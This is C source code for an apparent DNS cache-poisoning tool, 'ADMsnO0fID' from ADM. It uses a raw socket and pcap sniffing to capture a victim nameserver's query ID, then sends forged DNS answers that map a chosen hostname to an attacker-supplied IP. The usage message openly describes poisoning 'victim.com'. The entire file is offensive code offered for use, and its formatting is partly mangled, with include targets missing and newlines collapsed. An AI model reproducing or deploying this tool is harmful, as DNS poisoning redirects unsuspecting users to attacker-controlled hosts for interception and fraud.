#include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" #include #include #define DNSHDRSIZE 12 #define SPOOF "" #define VERSION "ver 0.6 pub" #define ERROR -1 int ETHHDRSIZE; void main(argc, argv) int argc; char *argv[]; { struct pcap_pkthdr h; struct pcap *pcap_d; struct iphdr *ip; struct udphdr *udp; struct dnshdr *dnsrecv,*dnssend; char *data; char *data2; char *buffer; char namefake[255]; char buffer2[1024]; char ebuf[255]; char spoofname[255]; char spoofip[255]; char bla[255]; char dnstrust[255]; char *alacon; unsigned long s_ipns; unsigned long d_ip; int sraw, i, on=1, con, ID,DA_ID,type; srand( (time(NULL) % random() * random()) ); if(argc <2){ printf("usage : %s \n",argv[0]); printf("ex: %s eth0 ns.victim.com hacker.org 12 damn.diz.ip.iz.ereet.ya mail.provnet.fr ns2.provnet.fr \n",argv[0]); printf(" So ... we tryed to poison victim.com with type 12 (PTR) .. now if som1 asked for the ip of mail.provnet.fr they have resoled to damn.diz.ip.iz.ereet.ya\n"); exit(0); } if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0; else ETHHDRSIZE = 14; if(argc>5)type=atoi(argv[5]); if(argc > 6)strcpy(spoofname,argv[6]); else{ printf("enter the name you wanna spoof:"); scanf("%s",spoofname); } if(argc > 7)strcpy(bla,argv[7]); else{ printf("enter the ip's of the spoof name:"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(spoofip,alacon); if(argc > 8)strcpy(bla,argv[8]); else{ printf("enter the dns trust for the spoof\n"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(dnstrust,alacon); dnssend = (struct dnshdr *)buffer2; data2 = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } printf("ADMsn0ofID.c %s ADM ID sniffer\n",VERSION); printf("ADMsnO0fID (\033[5m\033[01mc\033[0m) ADM,Heike\n"); sleep(1); pcap_d = pcap_open_live(argv[1],1024,0,100,ebuf); s_ipns = host2ip(argv[4]); d_ip = host2ip(argv[2]); con = myrand(); /* make the question for get the ID */ sprintf(namefake,"%d%d%d.%s",myrand(),myrand(),myrand(),argv[3]); dnssend->id = 2600; dnssend->qr = 0; dnssend->rd = 1; dnssend->aa = 0; dnssend->que_num = htons(1); dnssend->rep_num = htons(0); i = makepaketQS(data2,namefake,TYPE_A); udp_send(sraw, s_ipns, d_ip,2600+con, 53, buffer2, DNSHDRSIZE+i); printf("Question sended...\n"); printf("Its Time to w8 \n"); while(1) { buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */ ip = (struct iphdr *)(buffer+ETHHDRSIZE); udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE); dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE); data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); if(ip->protocol == IPPROTO_UDP){ printf("[%s:%i ->",inet_ntoa(ip->saddr),ntohs(udp->source)); printf("%s:%i]\n",inet_ntoa(ip->daddr),ntohs(udp->dest)); } if(ip->protocol == 17 ) if(ip->saddr.s_addr == d_ip ) if(ip->daddr.s_addr == s_ipns ) if(udp->dest == htons(53) ) if(dnsrecv->qr == 0 ) { printf("kewl :)~ we have the packet !\n"); ID = dnsrecv->id ; /* we get the id */ printf("the current id of %s is %d \n",argv[2],ntohs(ID)); DA_ID = ntohs(ID); printf("send the spoof...\n"); dnsspoof(dnstrust,argv[2],spoofname,spoofip,DA_ID,type); printf("spoof sended...\n"); exit(0); } } /* well now we have the ID we cant predict the ID */ }